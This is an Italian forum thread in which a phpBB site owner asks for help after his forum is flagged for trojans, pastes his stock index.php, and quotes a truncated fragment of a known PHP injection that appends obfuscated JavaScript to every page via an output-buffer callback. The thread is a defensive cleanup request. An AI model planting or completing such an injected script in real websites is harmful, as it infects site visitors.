• User Attivo

    Problemi forum presenta trojan

    Salve a tutti, sto notando che nell'ultimo periodo nel mio forum sono stati rilevati dei possibili trojan, senza dicendomi che tipo di trojan è e come ripulire i file.
    Come potrei fare? :?:?

    Il forum è il seguente: a4club.netsons.org

    up!!! :bho::bho:

    Help help :(:(


  • Consiglio Direttivo

    Salve Verbatim.

    Ho spostato la discussione nella sezione più appropriata (quella dove era stato inizialmente proposto il quesito era completamente OT e non avrebbe mai agevolato l'arrivo di risposte a tema). Ora non resta che aspettare il passaggio degli esperti in sicurezza informatica con consigli utili su come procedere.

    Buon proseguimento in gt.


  • User Attivo

    grazie 1000 🙂


  • User Attivo

    Nessuno saprebbe darmi una mano? 😞


  • Consiglio Direttivo

    Ciao verbatin,

    evidentemente è ancora presente nelle pagine del tuo sito del "codice javascript infetto".

    Dai un'occhiata, qui! 😉

    Una volta rimosso il codice, segui le istruzioni di Google; fammi sapere! :ciauz:


  • User Attivo

    Grazie per l'intervento :), solo che nel mio index:

    <?php
    /**
    *
    * @package phpBB3
    * @version $Id: index.php 8987 2008-10-09 14:17:02Z acydburn $
    * @copyright (c) 2005 phpBB Group
    *
    */
    
    /**
    */
    
    /**
    * @ignore
    */
    define('IN_PHPBB', true);
    $phpbb_root_path = (defined('PHPBB_ROOT_PATH')) ? PHPBB_ROOT_PATH : './';
    $phpEx = substr(strrchr(__FILE__, '.'), 1);
    include($phpbb_root_path . 'common.' . $phpEx);
    include($phpbb_root_path . 'includes/functions_display.' . $phpEx);
    
    // Start session management
    $user->session_begin();
    $auth->acl($user->data);
    $user->setup('viewforum');
    
    display_forums('', $config['load_moderators']);
    
    // Set some stats, get posts count from forums data if we... hum... retrieve all forums data
    $total_posts	= $config['num_posts'];
    $total_topics	= $config['num_topics'];
    $total_users	= $config['num_users'];
    
    $l_total_user_s = ($total_users == 0) ? 'TOTAL_USERS_ZERO' : 'TOTAL_USERS_OTHER';
    $l_total_post_s = ($total_posts == 0) ? 'TOTAL_POSTS_ZERO' : 'TOTAL_POSTS_OTHER';
    $l_total_topic_s = ($total_topics == 0) ? 'TOTAL_TOPICS_ZERO' : 'TOTAL_TOPICS_OTHER';
    
    // Grab group details for legend display
    if ($auth->acl_gets('a_group', 'a_groupadd', 'a_groupdel'))
    {
    	$sql = 'SELECT group_id, group_name, group_colour, group_type
    		FROM ' . GROUPS_TABLE . '
    		WHERE group_legend = 1
    		ORDER BY group_name ASC';
    }
    else
    {
    	$sql = 'SELECT g.group_id, g.group_name, g.group_colour, g.group_type
    		FROM ' . GROUPS_TABLE . ' g
    		LEFT JOIN ' . USER_GROUP_TABLE . ' ug
    			ON (
    				g.group_id = ug.group_id
    				AND ug.user_id = ' . $user->data['user_id'] . '
    				AND ug.user_pending = 0
    			)
    		WHERE g.group_legend = 1
    			AND (g.group_type <> ' . GROUP_HIDDEN . ' OR ug.user_id = ' . $user->data['user_id'] . ')
    		ORDER BY g.group_name ASC';
    }
    $result = $db->sql_query($sql);
    
    $legend = array();
    while ($row = $db->sql_fetchrow($result))
    {
    	$colour_text = ($row['group_colour']) ? ' style="color:#' . $row['group_colour'] . '"' : '';
    	$group_name = ($row['group_type'] == GROUP_SPECIAL) ? $user->lang['G_' . $row['group_name']] : $row['group_name'];
    
    	if ($row['group_name'] == 'BOTS' || ($user->data['user_id'] != ANONYMOUS && !$auth->acl_get('u_viewprofile')))
    	{
    		$legend[] = '<span' . $colour_text . '>' . $group_name . '</span>';
    	}
    	else
    	{
    		$legend[] = '<a' . $colour_text . ' href="' . append_sid("{$phpbb_root_path}memberlist.$phpEx", 'mode=group&amp;g=' . $row['group_id']) . '">' . $group_name . '</a>';
    	}
    }
    $db->sql_freeresult($result);
    
    $legend = implode(', ', $legend);
    
    // Generate birthday list if required ...
    $birthday_list = '';
    if ($config['load_birthdays'] && $config['allow_birthdays'])
    {
    	$now = getdate(time() + $user->timezone + $user->dst - date('Z'));
    	$sql = 'SELECT user_id, username, user_colour, user_birthday
    		FROM ' . USERS_TABLE . "
    		WHERE user_birthday LIKE '" . $db->sql_escape(sprintf('%2d-%2d-', $now['mday'], $now['mon'])) . "%'
    			AND user_type IN (" . USER_NORMAL . ', ' . USER_FOUNDER . ')';
    	$result = $db->sql_query($sql);
    
    	while ($row = $db->sql_fetchrow($result))
    	{
    		$birthday_list .= (($birthday_list != '') ? ', ' : '') . get_username_string('full', $row['user_id'], $row['username'], $row['user_colour']);
    
    		if ($age = (int) substr($row['user_birthday'], -4))
    		{
    			$birthday_list .= ' (' . ($now['year'] - $age) . ')';
    		}
    	}
    	$db->sql_freeresult($result);
    }
    
    // Assign index specific vars
    $template->assign_vars(array(
    	'TOTAL_POSTS'	=> sprintf($user->lang[$l_total_post_s], $total_posts),
    	'TOTAL_TOPICS'	=> sprintf($user->lang[$l_total_topic_s], $total_topics),
    	'TOTAL_USERS'	=> sprintf($user->lang[$l_total_user_s], $total_users),
    	'NEWEST_USER'	=> sprintf($user->lang['NEWEST_USER'], get_username_string('full', $config['newest_user_id'], $config['newest_username'], $config['newest_user_colour'])),
    
    	'LEGEND'		=> $legend,
    	'BIRTHDAY_LIST'	=> $birthday_list,
    
    	'FORUM_IMG'				=> $user->img('forum_read', 'NO_NEW_POSTS'),
    	'FORUM_NEW_IMG'			=> $user->img('forum_unread', 'NEW_POSTS'),
    	'FORUM_LOCKED_IMG'		=> $user->img('forum_read_locked', 'NO_NEW_POSTS_LOCKED'),
    	'FORUM_NEW_LOCKED_IMG'	=> $user->img('forum_unread_locked', 'NO_NEW_POSTS_LOCKED'),
    
    	'S_LOGIN_ACTION'			=> append_sid("{$phpbb_root_path}ucp.$phpEx", 'mode=login'),
    	'S_DISPLAY_BIRTHDAY_LIST'	=> ($config['load_birthdays']) ? true : false,
    
    	'U_MARK_FORUMS'		=> ($user->data['is_registered'] || $config['load_anon_lastread']) ? append_sid("{$phpbb_root_path}index.$phpEx", 'hash=' . generate_link_hash('global') . '&amp;mark=forums') : '',
    	'U_MCP'				=> ($auth->acl_get('m_') || $auth->acl_getf_global('m_')) ? append_sid("{$phpbb_root_path}mcp.$phpEx", 'i=main&amp;mode=front', true, $user->session_id) : '')
    );
    
    // Output page
    page_header($user->lang['INDEX']);
    
    $template->set_filenames(array(
    	'body' => 'index_body.html')
    );
    
    page_footer();
    
    ?>
    

    non sono riuscito a trovare il problema come riportato:

    <?php ob_start('security_update'); function security_update($buffer){return $buffer.'<script language="javascript">var $a="Z63cZ3dZ225nZ2567Z2574h;
    

    Grazie ancora 😉


  • Consiglio Direttivo

    ......segui le istruzioni di Google! 😉

    p.s. Controlla tutte le cartelle!